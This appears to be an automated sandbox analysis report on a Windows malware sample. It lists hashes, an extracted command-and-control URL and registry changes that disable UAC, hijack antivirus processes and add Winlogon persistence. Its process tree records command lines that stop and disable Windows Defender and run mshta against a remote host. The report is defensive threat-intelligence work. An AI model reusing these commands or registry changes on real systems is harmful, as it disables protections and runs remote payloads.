Analysis

max time kernel: 152s
max time network: 136s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 05-12-2022 12:39
Static task: static1

Behavioral task: behavioral1
Sample: 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource: win7-20221111-en

Behavioral task: behavioral2
Sample: 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource: win10v2004-20221111-en
General

Target: 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Size: 2.2MB
MD5: 44e75fcf7bffbb2d15574bd78abb663b
SHA1: 43be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256: 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512: c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
SSDEEP: 49152:Tb+qOGFGc/y+BMsAuII26f0EQh6fVnOTk3DSpX4R9DKp52:Tb2ou+mZpI268EQsx3D2XNpw

Malware Config

Extracted URL: http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=VUIIVLGQ&2=i-s&3=135&4=7601&5=6&6=1&7=99600&8=1033
Signatures

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  description / ioc / Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\wrvfvp.exe"  wrvfvp.exe

UAC bypass (3 IoCs)
  description / ioc / Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  wrvfvp.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  wrvfvp.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"  wrvfvp.exe

Executes dropped EXE (1 IoC)
  pid / Process
  1096  wrvfvp.exe

Sets file execution options in registry (2 TTPs, 16 IoCs)
  All entries are under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ and are made by wrvfvp.exe:
  Set value (str)  afwserv.exe\Debugger = "svchost.exe"
  Key created      msseces.exe
  Set value (str)  avastui.exe\Debugger = "svchost.exe"
  Set value (str)  ekrn.exe\Debugger = "svchost.exe"
  Key created      avastui.exe
  Set value (str)  msseces.exe\Debugger = "svchost.exe"
  Set value (str)  msascui.exe\Debugger = "svchost.exe"
  Key created      msascui.exe
  Key created      afwserv.exe
  Key created      egui.exe
  Set value (str)  egui.exe\Debugger = "svchost.exe"
  Key created      ekrn.exe
  Key created      avastsvc.exe
  Set value (str)  avastsvc.exe\Debugger = "svchost.exe"
  Key created      msmpeng.exe
  Set value (str)  msmpeng.exe\Debugger = "svchost.exe"

Stops running service(s) (3 TTPs)

Deletes itself (1 IoC)
  pid / Process
  1556  cmd.exe

Loads dropped DLL (2 IoCs)
  pid / Process
  1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  (2 identical entries)

Checks whether UAC is enabled (1 IoC)
  description / ioc / Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  wrvfvp.exe

Launches sc.exe (6 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid / Process
  520   sc.exe
  1552  sc.exe
  912   sc.exe
  528   sc.exe
  2036  sc.exe
  1524  sc.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings (1 IoC)
  description / ioc / Process
  Key created  \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / Process
  1096  wrvfvp.exe  (64 identical entries)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description / pid / Process
  Token: SeDebugPrivilege     1096  wrvfvp.exe  (2 entries)
  Token: SeShutdownPrivilege  1096  wrvfvp.exe  (2 entries)

Suspicious use of FindShellTrayWindow (4 IoCs)
  pid / Process
  1096  wrvfvp.exe  (4 identical entries)

Suspicious use of WriteProcessMemory (52 IoCs)
  description / pid / Process / procid_target (each of the 13 distinct writes is recorded 4 times)
  PID 1244 wrote to memory of 2036  1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  28
  PID 1244 wrote to memory of 1524  1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  29
  PID 1244 wrote to memory of 568   1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  32
  PID 1244 wrote to memory of 520   1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  33
  PID 568 wrote to memory of 1948   568   net.exe  36
  PID 1244 wrote to memory of 1096  1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  37
  PID 1244 wrote to memory of 1556  1244  900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe  38
  PID 1096 wrote to memory of 1552  1096  wrvfvp.exe  40
  PID 1096 wrote to memory of 912   1096  wrvfvp.exe  43
  PID 1096 wrote to memory of 1564  1096  wrvfvp.exe  42
  PID 1096 wrote to memory of 528   1096  wrvfvp.exe  45
  PID 1564 wrote to memory of 972   1564  net.exe  48
  PID 1096 wrote to memory of 1388  1096  wrvfvp.exe  49

System policy modification (1 TTP, 4 IoCs)
  description / ioc / Process
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System  wrvfvp.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  wrvfvp.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  wrvfvp.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"  wrvfvp.exe
Processes

C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 1244

    C:\Windows\SysWOW64\sc.exe
      Command line: sc stop WinDefend
      - Launches sc.exe
      PID: 2036

    C:\Windows\SysWOW64\sc.exe
      Command line: sc config WinDefend start= disabled
      - Launches sc.exe
      PID: 1524

    C:\Windows\SysWOW64\net.exe
      Command line: net stop msmpsvc
      - Suspicious use of WriteProcessMemory
      PID: 568

        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop msmpsvc
          PID: 1948

    C:\Windows\SysWOW64\sc.exe
      Command line: sc config msmpsvc start= disabled
      - Launches sc.exe
      PID: 520

    C:\Users\Admin\AppData\Roaming\Microsoft\wrvfvp.exe
      Command line: C:\Users\Admin\AppData\Roaming\Microsoft\wrvfvp.exe
      - Modifies WinLogon for persistence
      - UAC bypass
      - Executes dropped EXE
      - Sets file execution options in registry
      - Checks whether UAC is enabled
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
      - System policy modification
      PID: 1096

        C:\Windows\SysWOW64\sc.exe
          Command line: sc stop WinDefend
          - Launches sc.exe
          PID: 1552

        C:\Windows\SysWOW64\net.exe
          Command line: net stop msmpsvc
          - Suspicious use of WriteProcessMemory
          PID: 1564

            C:\Windows\SysWOW64\net1.exe
              Command line: C:\Windows\system32\net1 stop msmpsvc
              PID: 972

        C:\Windows\SysWOW64\sc.exe
          Command line: sc config WinDefend start= disabled
          - Launches sc.exe
          PID: 912

        C:\Windows\SysWOW64\sc.exe
          Command line: sc config msmpsvc start= disabled
          - Launches sc.exe
          PID: 528

        C:\Windows\SysWOW64\mshta.exe
          Command line: mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=VUIIVLGQ&2=i-s&3=135&4=7601&5=6&6=1&7=99600&8=1033"
          - Modifies Internet Explorer settings
          PID: 1388

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\900FFC~1.EXE" >> NUL
      - Deletes itself
      PID: 1556
Network
MITRE ATT&CK Enterprise v6
Downloads
Three download entries are listed, all with identical metadata:

Filesize: 2.2MB
MD5: 44e75fcf7bffbb2d15574bd78abb663b
SHA1: 43be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256: 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512: c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961